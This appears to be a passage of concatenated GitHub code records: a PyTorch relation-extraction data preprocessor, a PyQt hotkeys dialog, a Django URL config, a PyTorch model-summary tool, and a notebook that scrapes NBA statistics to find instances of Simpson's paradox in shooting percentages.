'':\n\t\t\tbreak\n\t\t\n\t\tcontent = content.strip().split()\n\t\t#get entity name\n\t\ten1 = content[2] \n\t\ten2 = content[3]\n\t\trelation = 0\n\t\tif content[4] not in relation2id:\n\t\t\trelation = relation2id['NA']\n\t\t\n\t\telse:\n\t\t\t\n\t\t\trelation = relation2id[content[4]]\n\t\t\t\n\t\t#put the same entity pair sentences into a dict\n\t\ttup = (en1,en2)\n\t\tlabel_tag = 0\n\t\tif tup not in train_sen:\n\t\t\ttrain_sen[tup]=[]\n\t\t\ttrain_sen[tup].append([])\n\t\t\ty_id = relation\n\t\t\tlabel_tag = 0\n\t\t\tlabel = [0 for i in range(len(relation2id))]\n\t\t\tlabel[y_id] = 1\n\t\t\ttrain_ans[tup] = []\n\t\t\ttrain_ans[tup].append(label)\n\t\telse:\n\t\t\ty_id = relation\n\t\t\tlabel_tag = 0\n\t\t\tlabel = [0 for i in range(len(relation2id))]\n\t\t\tlabel[y_id] = 1\n\t\t\t\n\t\t\ttemp = find_index(label,train_ans[tup])\n\t\t\tif temp == -1:\n\t\t\t\ttrain_ans[tup].append(label)\n\t\t\t\tlabel_tag = len(train_ans[tup])-1\n\t\t\t\ttrain_sen[tup].append([])\n\t\t\telse:\n\t\t\t\tlabel_tag = temp\n\n\t\tsentence = content[5:-1]\n\t\t\n\t\ten1pos = 0\n\t\ten2pos = 0\n\t\t\n\t\tfor i in range(len(sentence)):\n\t\t\tif sentence[i] == en1:\n\t\t\t\ten1pos = i\n\t\t\tif sentence[i] == en2:\n\t\t\t\ten2pos = i\n\t\toutput = []\n\n\t\tfor i in range(fixlen):\n\t\t\tword = word2id['BLANK']\n\t\t\trel_e1 = pos_embed(i - en1pos)\n\t\t\trel_e2 = pos_embed(i - en2pos)\n\t\t\toutput.append([word,rel_e1,rel_e2])\n\n\t\tfor i in range(min(fixlen,len(sentence))):\n\t\t\tword = 0\n\t\t\tif sentence[i] not in word2id:\n\t\t\t\tword = word2id['UNK']\n\t\t\telse:\n\t\t\t\tword = word2id[sentence[i]]\n\t\t\t\n\t\t\toutput[i][0] = word\n\n\t\ttrain_sen[tup][label_tag].append(output)\n\t\n\tprint('reading test data ...')\n\n\ttest_sen = {} #{entity pair:[[sentence 1],[sentence 2]...]}\n\ttest_ans = {} #{entity pair:[labels,...]} the labels is N-hot vector (N is the number of multi-label)\n\n\tf = open('./origin_data/test.txt','r')\n\n\twhile True:\n\t\tcontent = f.readline()\n\t\tif content == '':\n\t\t\tbreak\n\t\t\n\t\tcontent = content.strip().split()\n\t\ten1 = content[2]\n\t\ten2 = content[3]\n\t\trelation = 0\n\t\tif content[4] not in relation2id:\n\t\t\trelation = relation2id['NA']\n\t\t\t\n\t\telse:\n\t\t\n\t\t\trelation = relation2id[content[4]]\t\t\n\t\ttup = (en1,en2)\n\t\t\n\t\tif tup not in test_sen:\n\t\t\ttest_sen[tup]=[]\n\t\t\ty_id = relation\n\t\t\tlabel_tag = 0\n\t\t\tlabel = [0 for i in range(len(relation2id))]\n\t\t\tlabel[y_id] = 1\n\t\t\ttest_ans[tup] = label\n\t\telse:\n\t\t\ty_id = relation\n\t\t\ttest_ans[tup][y_id] = 1\n\t\t\t\n\t\tsentence = content[5:-1]\n\n\t\ten1pos = 0\n\t\ten2pos = 0\n\t\t\n\t\tfor i in range(len(sentence)):\n\t\t\tif sentence[i] == en1:\n\t\t\t\ten1pos = i\n\t\t\tif sentence[i] == en2:\n\t\t\t\ten2pos = i\n\t\toutput = []\n\n\t\tfor i in range(fixlen):\n\t\t\tword = word2id['BLANK']\n\t\t\trel_e1 = pos_embed(i - en1pos)\n\t\t\trel_e2 = pos_embed(i - en2pos)\n\t\t\toutput.append([word,rel_e1,rel_e2])\n\n\t\tfor i in range(min(fixlen,len(sentence))):\n\t\t\tword = 0\n\t\t\tif sentence[i] not in word2id:\n\t\t\t\tword = word2id['UNK']\n\t\t\telse:\n\t\t\t\tword = word2id[sentence[i]]\n\n\t\t\toutput[i][0] = word\n\t\ttest_sen[tup].append(output)\n\t\n\ttrain_x = []\n\ttrain_y = []\n\ttest_x = []\n\ttest_y = []\n\n\tprint('organizing train data')\n\tf = open('./data/train_q&a.txt','w')\n\ttemp = 0\n\tfor i in train_sen:\n\t\tif len(train_ans[i]) != len(train_sen[i]):\n\t\t\tprint('ERROR')\n\t\tlenth = len(train_ans[i])\n\t\tfor j in range(lenth):\n\t\t\ttrain_x.append(train_sen[i][j])\n\t\t\ttrain_y.append(train_ans[i][j])\n\t\t\tf.write(str(temp)+'\\t'+i[0]+'\\t'+i[1]+'\\t'+str(np.argmax(train_ans[i][j]))+'\\n')\n\t\t\ttemp+=1\n\tf.close()\n\n\tprint('organizing test data')\n\tf = open('./data/test_q&a.txt','w')\n\ttemp=0\n\tfor i in test_sen:\t\t\n\t\ttest_x.append(test_sen[i])\n\t\ttest_y.append(test_ans[i])\n\t\ttempstr = ''\n\t\tfor j in range(len(test_ans[i])):\n\t\t\tif test_ans[i][j]!=0:\n\t\t\t\ttempstr = tempstr+str(j)+'\\t'\n\t\tf.write(str(temp)+'\\t'+i[0]+'\\t'+i[1]+'\\t'+tempstr+'\\n')\n\t\ttemp+=1\n\tf.close()\n\n\ttrain_x = np.array(train_x)\n\ttrain_y = np.array(train_y)\n\ttest_x = np.array(test_x)\n\ttest_y = np.array(test_y)\n\t\n\n\tnp.save('./data/vec.npy',vec)\n\tnp.save('./data/train_x.npy',train_x)\n\tnp.save('./data/train_y.npy',train_y)\n\tnp.save('./data/testall_x.npy',test_x)\n\tnp.save('./data/testall_y.npy',test_y)\n\n\t#get test data for P@N evaluation, in which only entity pairs with more than 1 sentence exist\n\tprint('get test data for p@n test')\n\t\n\tpone_test_x = []\n\tpone_test_y = []\n\n\tptwo_test_x = []\n\tptwo_test_y = []\n\t\n\tpall_test_x = []\n\tpall_test_y = []\n\n\tfor i in range(len(test_x)):\n\t\tif len(test_x[i]) > 1:\n\t\t\t\n\t\t\tpall_test_x.append(test_x[i])\n\t\t\tpall_test_y.append(test_y[i])\n\t\t\t\n\t\t\tonetest = []\n\t\t\ttemp = np.random.randint(len(test_x[i]))\n\t\t\tonetest.append(test_x[i][temp])\n\t\t\tpone_test_x.append(onetest)\n\t\t\tpone_test_y.append(test_y[i])\n\n\t\t\ttwotest = []\n\t\t\ttemp1 = np.random.randint(len(test_x[i]))\n\t\t\ttemp2 = np.random.randint(len(test_x[i]))\n\t\t\twhile temp1 == temp2:\n\t\t\t\ttemp2 = np.random.randint(len(test_x[i]))\n\t\t\ttwotest.append(test_x[i][temp1])\n\t\t\ttwotest.append(test_x[i][temp2])\n\t\t\tptwo_test_x.append(twotest)\n\t\t\tptwo_test_y.append(test_y[i])\n\n\tpone_test_x = np.array(pone_test_x)\n\tpone_test_y = np.array(pone_test_y)\n\tptwo_test_x = np.array(ptwo_test_x)\n\tptwo_test_y = np.array(ptwo_test_y)\t\n\tpall_test_x = np.array(pall_test_x)\n\tpall_test_y = np.array(pall_test_y)\n\n\tnp.save('./data/pone_test_x.npy',pone_test_x)\n\tnp.save('./data/pone_test_y.npy',pone_test_y)\n\tnp.save('./data/ptwo_test_x.npy',ptwo_test_x)\n\tnp.save('./data/ptwo_test_y.npy',ptwo_test_y)\n\tnp.save('./data/pall_test_x.npy',pall_test_x)\n\tnp.save('./data/pall_test_y.npy',pall_test_y)\n\ndef seperate():\n\t\n\tprint('reading training data')\n\tx_train = np.load('./data/train_x.npy')\n\n\ttrain_word = []\n\ttrain_pos1 = []\n\ttrain_pos2 = []\n\n\tprint('seprating train data')\n\tfor i in range(len(x_train)):\n\t\tword = []\n\t\tpos1 = []\n\t\tpos2 = []\n\t\tfor j in x_train[i]:\n\t\t\ttemp_word = []\n\t\t\ttemp_pos1 = []\n\t\t\ttemp_pos2 = []\n\t\t\tfor k in j:\n\t\t\t\ttemp_word.append(k[0])\n\t\t\t\ttemp_pos1.append(k[1])\n\t\t\t\ttemp_pos2.append(k[2])\n\t\t\tword.append(temp_word)\n\t\t\tpos1.append(temp_pos1)\n\t\t\tpos2.append(temp_pos2)\n\t\ttrain_word.append(word)\n\t\ttrain_pos1.append(pos1)\n\t\ttrain_pos2.append(pos2)\n\n\ttrain_word = np.array(train_word)\n\ttrain_pos1 = np.array(train_pos1)\n\ttrain_pos2 = np.array(train_pos2)\n\tnp.save('./data/train_word.npy',train_word)\n\tnp.save('./data/train_pos1.npy',train_pos1)\n\tnp.save('./data/train_pos2.npy',train_pos2)\n\n\tprint('reading p-one test data')\n\tx_test = np.load('./data/pone_test_x.npy')\n\tprint('seperating p-one test data')\n\ttest_word = []\n\ttest_pos1 = []\n\ttest_pos2 = []\n\n\tfor i in range(len(x_test)):\n\t\tword = []\n\t\tpos1 = []\n\t\tpos2 = []\n\t\tfor j in x_test[i]:\n\t\t\ttemp_word = []\n\t\t\ttemp_pos1 = []\n\t\t\ttemp_pos2 = []\n\t\t\tfor k in j:\n\t\t\t\ttemp_word.append(k[0])\n\t\t\t\ttemp_pos1.append(k[1])\n\t\t\t\ttemp_pos2.append(k[2])\n\t\t\tword.append(temp_word)\n\t\t\tpos1.append(temp_pos1)\n\t\t\tpos2.append(temp_pos2)\n\t\ttest_word.append(word)\n\t\ttest_pos1.append(pos1)\n\t\ttest_pos2.append(pos2)\n\n\ttest_word = np.array(test_word)\n\ttest_pos1 = np.array(test_pos1)\n\ttest_pos2 = np.array(test_pos2)\n\tnp.save('./data/pone_test_word.npy',test_word)\n\tnp.save('./data/pone_test_pos1.npy',test_pos1)\n\tnp.save('./data/pone_test_pos2.npy',test_pos2)\n\n\tprint('reading p-two test data')\n\tx_test = np.load('./data/ptwo_test_x.npy')\n\tprint('seperating p-two test data')\n\ttest_word = []\n\ttest_pos1 = []\n\ttest_pos2 = []\n\n\tfor i in range(len(x_test)):\n\t\tword = []\n\t\tpos1 = []\n\t\tpos2 = []\n\t\tfor j in x_test[i]:\n\t\t\ttemp_word = []\n\t\t\ttemp_pos1 = []\n\t\t\ttemp_pos2 = []\n\t\t\tfor k in j:\n\t\t\t\ttemp_word.append(k[0])\n\t\t\t\ttemp_pos1.append(k[1])\n\t\t\t\ttemp_pos2.append(k[2])\n\t\t\tword.append(temp_word)\n\t\t\tpos1.append(temp_pos1)\n\t\t\tpos2.append(temp_pos2)\n\t\ttest_word.append(word)\n\t\ttest_pos1.append(pos1)\n\t\ttest_pos2.append(pos2)\n\n\ttest_word = np.array(test_word)\n\ttest_pos1 = np.array(test_pos1)\n\ttest_pos2 = np.array(test_pos2)\n\tnp.save('./data/ptwo_test_word.npy',test_word)\n\tnp.save('./data/ptwo_test_pos1.npy',test_pos1)\n\tnp.save('./data/ptwo_test_pos2.npy',test_pos2)\n\n\tprint('reading p-all test data')\n\tx_test = np.load('./data/pall_test_x.npy')\n\tprint('seperating p-all test data')\n\ttest_word = []\n\ttest_pos1 = []\n\ttest_pos2 = []\n\n\tfor i in range(len(x_test)):\n\t\tword = []\n\t\tpos1 = []\n\t\tpos2 = []\n\t\tfor j in x_test[i]:\n\t\t\ttemp_word = []\n\t\t\ttemp_pos1 = []\n\t\t\ttemp_pos2 = []\n\t\t\tfor k in j:\n\t\t\t\ttemp_word.append(k[0])\n\t\t\t\ttemp_pos1.append(k[1])\n\t\t\t\ttemp_pos2.append(k[2])\n\t\t\tword.append(temp_word)\n\t\t\tpos1.append(temp_pos1)\n\t\t\tpos2.append(temp_pos2)\n\t\ttest_word.append(word)\n\t\ttest_pos1.append(pos1)\n\t\ttest_pos2.append(pos2)\n\n\ttest_word = np.array(test_word)\n\ttest_pos1 = np.array(test_pos1)\n\ttest_pos2 = np.array(test_pos2)\n\tnp.save('./data/pall_test_word.npy',test_word)\n\tnp.save('./data/pall_test_pos1.npy',test_pos1)\n\tnp.save('./data/pall_test_pos2.npy',test_pos2)\n\n\n\tprint('seperating test all data')\n\tx_test = np.load('./data/testall_x.npy')\n\n\ttest_word = []\n\ttest_pos1 = []\n\ttest_pos2 = []\n\n\tfor i in range(len(x_test)):\n\t\tword = []\n\t\tpos1 = []\n\t\tpos2 = []\n\t\tfor j in x_test[i]:\n\t\t\ttemp_word = []\n\t\t\ttemp_pos1 = []\n\t\t\ttemp_pos2 = []\n\t\t\tfor k in j:\n\t\t\t\ttemp_word.append(k[0])\n\t\t\t\ttemp_pos1.append(k[1])\n\t\t\t\ttemp_pos2.append(k[2])\n\t\t\tword.append(temp_word)\n\t\t\tpos1.append(temp_pos1)\n\t\t\tpos2.append(temp_pos2)\n\t\ttest_word.append(word)\n\t\ttest_pos1.append(pos1)\n\t\ttest_pos2.append(pos2)\n\n\n\n\ttest_word = np.array(test_word)\n\ttest_pos1 = np.array(test_pos1)\n\ttest_pos2 = np.array(test_pos2)\n\n\tnp.save('./data/testall_word.npy',test_word)\n\tnp.save('./data/testall_pos1.npy',test_pos1)\n\tnp.save('./data/testall_pos2.npy',test_pos2)\n\n\ndef getsmall():\n\tprint('reading training data')\n\tword = np.load('./data/train_word.npy')\n\tpos1 = np.load('./data/train_pos1.npy')\n\tpos2 = np.load('./data/train_pos2.npy')\n\ty = np.load('./data/train_y.npy')\n\n\tnew_word = []\n\tnew_pos1 = []\n\tnew_pos2 = []\n\tnew_y = []\n\n\t#we slice some big batch in train data into small batches in case of running out of memory\n\tprint('get small training data')\n\tfor i in range(len(word)):\n\t\tlenth = len(word[i])\n\t\tif lenth <= 1000:\n\t\t\tnew_word.append(word[i])\n\t\t\tnew_pos1.append(pos1[i])\n\t\t\tnew_pos2.append(pos2[i])\n\t\t\tnew_y.append(y[i])\n\n\t\tif lenth > 1000 and lenth < 2000:\n\t\t\t\n\t\t\tnew_word.append(word[i][:1000])\n\t\t\tnew_word.append(word[i][1000:])\n\t\t\t\n\t\t\tnew_pos1.append(pos1[i][:1000])\n\t\t\tnew_pos1.append(pos1[i][1000:])\n\n\t\t\tnew_pos2.append(pos2[i][:1000])\n\t\t\tnew_pos2.append(pos2[i][1000:])\n\t\t\t\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\n\t\t\n\t\tif lenth > 2000 and lenth < 3000:\n\t\t\tnew_word.append(word[i][:1000])\n\t\t\tnew_word.append(word[i][1000:2000])\n\t\t\tnew_word.append(word[i][2000:])\n\t\t\t\n\t\t\tnew_pos1.append(pos1[i][:1000])\n\t\t\tnew_pos1.append(pos1[i][1000:2000])\n\t\t\tnew_pos1.append(pos1[i][2000:])\n\t\t\t\n\t\t\tnew_pos2.append(pos2[i][:1000])\n\t\t\tnew_pos2.append(pos2[i][1000:2000])\n\t\t\tnew_pos2.append(pos2[i][2000:])\n\t\t\t\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\n\t\tif lenth > 3000 and lenth < 4000:\n\t\t\tnew_word.append(word[i][:1000])\n\t\t\tnew_word.append(word[i][1000:2000])\n\t\t\tnew_word.append(word[i][2000:3000])\n\t\t\tnew_word.append(word[i][3000:])\n\t\t\n\t\t\tnew_pos1.append(pos1[i][:1000])\n\t\t\tnew_pos1.append(pos1[i][1000:2000])\n\t\t\tnew_pos1.append(pos1[i][2000:3000])\n\t\t\tnew_pos1.append(pos1[i][3000:])\n\n\t\t\tnew_pos2.append(pos2[i][:1000])\n\t\t\tnew_pos2.append(pos2[i][1000:2000])\n\t\t\tnew_pos2.append(pos2[i][2000:3000])\n\t\t\tnew_pos2.append(pos2[i][3000:])\n\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\n\t\tif lenth > 4000:\n\t\t\t\n\t\t\tnew_word.append(word[i][:1000])\n\t\t\tnew_word.append(word[i][1000:2000])\n\t\t\tnew_word.append(word[i][2000:3000])\n\t\t\tnew_word.append(word[i][3000:4000])\n\t\t\tnew_word.append(word[i][4000:])\n\n\t\t\tnew_pos1.append(pos1[i][:1000])\n\t\t\tnew_pos1.append(pos1[i][1000:2000])\n\t\t\tnew_pos1.append(pos1[i][2000:3000])\n\t\t\tnew_pos1.append(pos1[i][3000:4000])\n\t\t\tnew_pos1.append(pos1[i][4000:])\n\n\t\t\tnew_pos2.append(pos2[i][:1000])\n\t\t\tnew_pos2.append(pos2[i][1000:2000])\n\t\t\tnew_pos2.append(pos2[i][2000:3000])\n\t\t\tnew_pos2.append(pos2[i][3000:4000])\n\t\t\tnew_pos2.append(pos2[i][4000:])\n\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\t\t\tnew_y.append(y[i])\n\n\n\tnew_word = np.array(new_word)\n\tnew_pos1 = np.array(new_pos1)\n\tnew_pos2 = np.array(new_pos2)\n\tnew_y = np.array(new_y)\n\n\tnp.save('./data/small_word.npy',new_word)\n\tnp.save('./data/small_pos1.npy',new_pos1)\n\tnp.save('./data/small_pos2.npy',new_pos2)\n\tnp.save('./data/small_y.npy',new_y)\n\n#get answer metric for PR curve evaluation\ndef getans():\n\ttest_y = np.load('./data/testall_y.npy')\n\teval_y = []\n\tfor i in test_y:\n\t\teval_y.append(i[1:])\n\tallans = np.reshape(eval_y,(-1))\n\tnp.save('./data/allans.npy',allans)\n\ndef get_metadata():\n\tfwrite = open('./data/metadata.tsv','w')\n\tf = open('./origin_data/vec.txt')\n\tf.readline()\n\twhile True:\n\t\tcontent = f.readline().strip()\n\t\tif content == '':\n\t\t\tbreak\n\t\tname = content.split()[0]\n\t\tfwrite.write(name+'\\n')\n\tf.close()\n\tfwrite.close()\n\n\ninit()\nseperate()\ngetsmall()\ngetans()\nget_metadata()\n\n","repo_name":"Pierre-Wong/pytorch-NRE","sub_path":"initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":14291,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"22045468668","text":"\"\"\"Hotkeys plugins voor gtk-accel based apps - GUI toolkit specifieke code\n\"\"\"\nimport PyQt5.QtWidgets as qtw\nfrom ..dialogs_qt import CompleteDialog\n\n\nclass AccelCompleteDialog(CompleteDialog):\n \"\"\"(re)definition of generic dialog used in the main program\n \"\"\"\n def read_data(self):\n \"lees de vóór aanroep van de class ingestelde gegevens in\"\n self.desc = self.master.dialog_data['descdict']\n self.cmds = self.master.dialog_data['actions']\n\n def build_table(self):\n \"vul de tabel met in te voeren gegevens\"\n row = 0\n cmds, self.cmds = self.cmds, {}\n for key, cmd in sorted(cmds.items(), key=lambda x: x[1]):\n ## print(key, cmd)\n new_item = qtw.QTableWidgetItem()\n try:\n new_item.setText(cmd)\n self.cmds[cmd] = key\n except TypeError:\n new_item.setText('/'.join(cmd))\n self.cmds['/'.join(cmd)] = key\n self.p0list.setItem(row, 0, new_item)\n new_item = qtw.QTableWidgetItem()\n try:\n new_item.setText(self.desc[key])\n except KeyError:\n new_item.setText('')\n self.p0list.setItem(row, 1, new_item)\n row += 1\n","repo_name":"albertvisser/hotkeys","sub_path":"plugin_examples/gtkaccel_keys_qt.py","file_name":"gtkaccel_keys_qt.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21294883349","text":"def prime(n):\n for i in range (2, n-1):\n if((n%i)==0):\n break\n \n if(i/', DetailAlbum.as_view(), name='album details'),\r\n path('edit//', EditAlbum.as_view(), name='edit album'),\r\n path('delete-album//', DeleteAlbum.as_view(), name='delete album'),\r\n\r\n path('song/', include([\r\n path('', CreateSong.as_view(), name='create song'),\r\n path('all/', AllSongs.as_view(), name='songs in album'),\r\n ])),\r\n\r\n path('author/', CreateAuthor.as_view(), name='create author'),\r\n path('publishing/', CreatePublishing.as_view(), name='create publishing'), ]))\r\n]\r\n","repo_name":"SKuncheva/music_app","sub_path":"music/album/album/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4143569605","text":"from collections import defaultdict\nfrom tinydb import TinyDB, Query\nfrom tinydb.storages import MemoryStorage\n\nfrom rich import print\nfrom ..tables.table_view import TableView\nfrom ..utils.utils import (\n find_mismatches,\n get_module_attrs,\n get_module_name,\n get_leaf_modules,\n show_comparison\n)\n\n\nclass ModelSummary(object):\n \"\"\"Wrapper class for PyTorch models. Stores the counts of different types of leaf modules in the model.\"\"\"\n\n def __init__(self, model, name):\n self.model = model\n self.name = name\n self._db = TinyDB(storage=MemoryStorage)\n\n self._init_db()\n\n def _init_db(self):\n \"\"\"Initializes the TinyDB database with data about the different types of leaf modules present in this model.\"\"\"\n leaf_modules = get_leaf_modules(self.model)\n\n for module in leaf_modules:\n self._add_module_to_db(module)\n\n def _create_row(self, module, n_params=True):\n \"\"\"Creates a row for the TinyDB database based on the name and attributes of the given module.\n\n Args:\n module : Instance of torch.nn.Module to create the row for.\n n_params : If True, also adds the number of parameters with and without .requires_grad to the row.\n\n Returns:\n Dictionary representing a record in the database for the given module.\n \"\"\"\n module_name = get_module_name(module)\n module_attrs = get_module_attrs(module)\n\n row = {}\n row['type'] = module_name\n\n for attr in module_attrs:\n row[attr] = getattr(module, attr)\n\n if n_params:\n row['n_params_no_grad'] = sum([p.numel() for p in module.parameters() if not p.requires_grad])\n row['n_params_grad'] = sum([p.numel() for p in module.parameters() if p.requires_grad])\n\n return row\n\n def _add_module_to_db(self, module):\n \"\"\"Adds a record to the database for the given module. If a record is already present for the\n given module, increment the \"count\" field of the record for that module by one.\n\n Args:\n module : Instance of torch.nn.Module to add/update in the database.\n\n Returns:\n None.\n \"\"\"\n row = self._create_row(module)\n result = self._db.search(Query().fragment(row))\n\n assert len(result) == 0 or len(result) == 1, f\"More than one results found for query: {row}\"\n\n if result == []:\n row['count'] = 1\n self._db.insert(row)\n else:\n self._db.upsert({'count': result[0]['count'] + 1}, Query().fragment(row))\n\n def get_db(self):\n \"\"\"Returns the database.\"\"\"\n return self._db\n\n def compare(self, other, as_table=True):\n \"\"\"Compares self.model with another model.\n\n Args:\n other : Model to compare self.model to, wrapped in a ModelSummary object.\n as_table : If True, prints the comparison as tables. Else, prints it as json.\n\n Returns:\n None.\n \"\"\"\n other_db = other.get_db()\n\n db_rows = [row for row in self._db.all()]\n other_db_rows = [row for row in other_db.all()]\n\n mismatches_other, _ = find_mismatches(db_rows, other_db_rows)\n mismatches_self, _ = find_mismatches(other_db_rows, db_rows)\n\n missing_modules = dict()\n missing_modules[self.name] = mismatches_self\n missing_modules[other.name] = mismatches_other\n\n if mismatches_other or mismatches_self:\n print(\"\\n[bold][red]Number of registered leaf modules do not match! See below:[/red][/bold]\")\n else:\n print(\"\\n[bold][green]Number of registered leaf modules match![/green][/bold]\")\n\n show_comparison(missing_modules, as_table)\n\n def print(self, as_table=True, modules=None):\n \"\"\"Prints the numbers of the various types of leaf modules present in the model.\n Each row in the table shows indicates a module of a certain type, with a certain combination\n of attributes. Each column represents an attribute of the module, along with additional information\n like the number of instances of this module (with this combination of attributes) present in the model,\n and the number of trainable and untrainable parameters present in the module.\n\n Args:\n as_table : If True, prints the summary as tables. Else, prints it as json.\n modules : List of leaf module names (like torch.nn.modules.conv.Conv2d). If not None,\n shows only information about the module types present in the list.\n\n Returns:\n None.\n \"\"\"\n print(f\"\\n[bold][magenta]Summary of {self.name}[/magenta][/bold]\")\n\n all_rows = self._db.all()\n all_rows = sorted(all_rows, key=lambda x: str(x))\n\n row_types = defaultdict(lambda: [])\n\n for row in all_rows:\n if modules is None or (modules is not None and row[\"type\"] in modules):\n row_types[row[\"type\"]].append(row)\n\n for rows in row_types.values():\n table = TableView(rows, \"\")\n\n if as_table:\n table.print()\n else:\n print(table.data)\n\n n_params_grad = sum(p.numel() for p in self.model.parameters() if p.requires_grad)\n n_params_no_grad = sum(p.numel() for p in self.model.parameters() if p.requires_grad == False)\n\n print(f\"{len(all_rows)} different types of leaf modules\")\n print(f\"{n_params_grad} parameters with requires_grad = True\")\n print(f\"{n_params_no_grad} parameters with requires_grad = False\")\n","repo_name":"Neonkraft/TorchBug","sub_path":"torchbug/summary/model_summary.py","file_name":"model_summary.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"11906707937","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Simpson's Paradox\n\n# ## Summary \n\n# Simpson's paradox arises in a variety of settings where statistics are present. Here, I dive into a look into instances of it in NBA shooting data. I expect it to be heavily present because of the differences in playing styles and difficulties of certain shots. Specifically, three pointers are harder to make than two pointers, and the best shooters shoot them more than worse shooters, so we should see a bunch of examples of pairs of players, say player A & player B, where player A is a shooter and shoots lots of 2s and shoots both 2s and 3s at a higher percentage than player B, but since a bigger proportion of player B's shots are 3s, player A has a higher overall FG%.\n# \n# Since I think there will be many cases of this, I'll only look at instances within the top scorers in the league, considering only the pairs of players within the top 25 scores.\n\n# Special shoutout to [Sports Reference](https://www.sports-reference.com/) (SR), specifically [Basketball Reference](https://www.basketball-reference.com/) (BR), for all of the data on the players' minutes played, positions, and birth places. This was partially inspired by a [reddit post](https://www.reddit.com/r/nba/comments/5wb6j7/oc_simpsons_paradox_lebrons_overall_3p_is_greater/) and also by the Derek Jeter-David Justice example of [Simpson's paradox on Wikipedia](https://en.wikipedia.org/wiki/Simpson%27s_paradox)\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport requests\nfrom bs4 import BeautifulSoup as BS\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport mplcursors\n\n\n# In[2]:\n\n\nyear = 2022 # which year you'd like to take a look at (keep in mind 3pt-line introduced in '79')\n\nurl = \"https://www.basketball-reference.com/leagues/NBA_\" + str(year) + \"_totals.html#totals_stats::pts\"\ntables = pd.read_html(url) \ntable = pd.DataFrame(tables[0]) # This gives the desired table\nclean_Table = table[[\"Player\",\"G\", \"FG%\", \"2P%\", \"3P%\", \"3P\", \"3PA\", \"2P\", \"2PA\", \"PTS\"]] # Select the relevant cols\nclean_Table = clean_Table[clean_Table.Player != 'Player'] # Eliminate bad rows\nclean_Table.fillna(\"0\", inplace = True) # In case some players didn't attempt 3s or 2s\n\n# This for loop converts the strings to floats so that we can compare them later\nfor cat in [\"G\", \"FG%\", \"2P%\", \"3P%\", \"3P\", \"3PA\", \"2P\", \"2PA\", \"PTS\"]:\n clean_Table[cat] = [np.float(clean_Table.iloc[i][cat]) if clean_Table.iloc[i][cat][0] != \"0\" else 0.0 for i in range(len(clean_Table[cat]))]\n\nclean_Table[\"PPG\"] = clean_Table[\"PTS\"]/clean_Table[\"G\"] # adda column with points per game\nplayers = clean_Table.to_numpy() # convert the pd DataFrame to a numpy array\n\nplayers = players[players[:, -1].argsort()][::-1] # sort by leading scorers\nplyrs = players[players[:, 1] >= 58][:25] # only take the top 25 of those who played >= 58 games\n\n\n# In[3]:\n\n\ndef compute_simpsons(players):\n \"\"\"\n This function takes in a numpy array of the players with their stats and \n returns a dataframe of the pairs players whose FG%, 2P%, and 3P% satisfy Simpson's paradox\n \"\"\"\n d = {\"namesA\":[], \"percA\" : [], \"2percA\" : [], \"3percA\" : [], \"2attA\": [] , \"3attA\" : [],\"namesB\":[], \"percB\" : [], \"2percB\" : [], \"3percB\" : [], \"2attB\": [] , \"3attB\" : []}\n for i in range(25):\n player1 = players[i]\n for j in range(i+1, 25):\n player2 = players[j]\n if player1[2] > player2[2] and player1[3] < player2[3] and player1[4] < player2[4]:\n playerA = player1\n playerB = player2\n d[\"namesA\"].append(playerA[0])\n d[\"percA\"].append(playerA[2])\n d[\"2percA\"].append(playerA[3])\n d[\"3percA\"].append(playerA[4])\n d[\"3attA\"].append(playerA[6])\n d[\"2attA\"].append(playerA[8])\n d[\"namesB\"].append(playerB[0])\n d[\"percB\"].append(playerB[2])\n d[\"2percB\"].append(playerB[3])\n d[\"3percB\"].append(playerB[4])\n d[\"3attB\"].append(playerB[6])\n d[\"2attB\"].append(playerB[8])\n\n elif player1[2] < player2[2] and player1[3] > player2[3] and player1[4] > player2[4]:\n playerA = player2\n playerB = player1\n d[\"namesA\"].append(playerA[0])\n d[\"percA\"].append(playerA[2])\n d[\"2percA\"].append(playerA[3])\n d[\"3percA\"].append(playerA[4])\n d[\"3attA\"].append(playerA[6])\n d[\"2attA\"].append(playerA[8])\n d[\"namesB\"].append(playerB[0])\n d[\"percB\"].append(playerB[2])\n d[\"2percB\"].append(playerB[3])\n d[\"3percB\"].append(playerB[4])\n d[\"3attB\"].append(playerB[6])\n d[\"2attB\"].append(playerB[8])\n\n return pd.DataFrame(d)\n\n\n# This table shows all of the pairs of players in the top 25 scorers (min 58 games) whose shooting percentages demonstrate Simpson's paradox. For each row, the player in the first column has a higher shooting percentage than the player in the second column, but the player in the second column has a higher 2-point percentage and a higher 3-point percentage than the player in the first column. Despite shooting better in both categories, the player in the second column has a worse overall shooting percentage because of the number of shots taken at the different distances. \n# \n# Players tend to make 2-pointers at higher percentage rates than 3-pointers, so if a player shoots more 2s, their shooting percentage will likely be higher. Conversely, if a player shoots a lot of 3s, their shooting percentage will likely be lower. This is why many of the players in the first column are known to be high volume 2-point shooters and many in the right column are high volume 3-point shooters. \n\n# In[4]:\n\n\nexamples = compute_simpsons(plyrs)\n\n\n# In[5]:\n\n\nplyrsDF = pd.DataFrame(plyrs)\nplyrsDF.head()\nplyrsDF.set_axis([\"Name\", \"G\", \"FG%\", \"2P%\", \"3P%\", \"3P\", \"3PA\", \"2P\", \"2PA\", \"PTS\", \"PPG\"], axis=1, 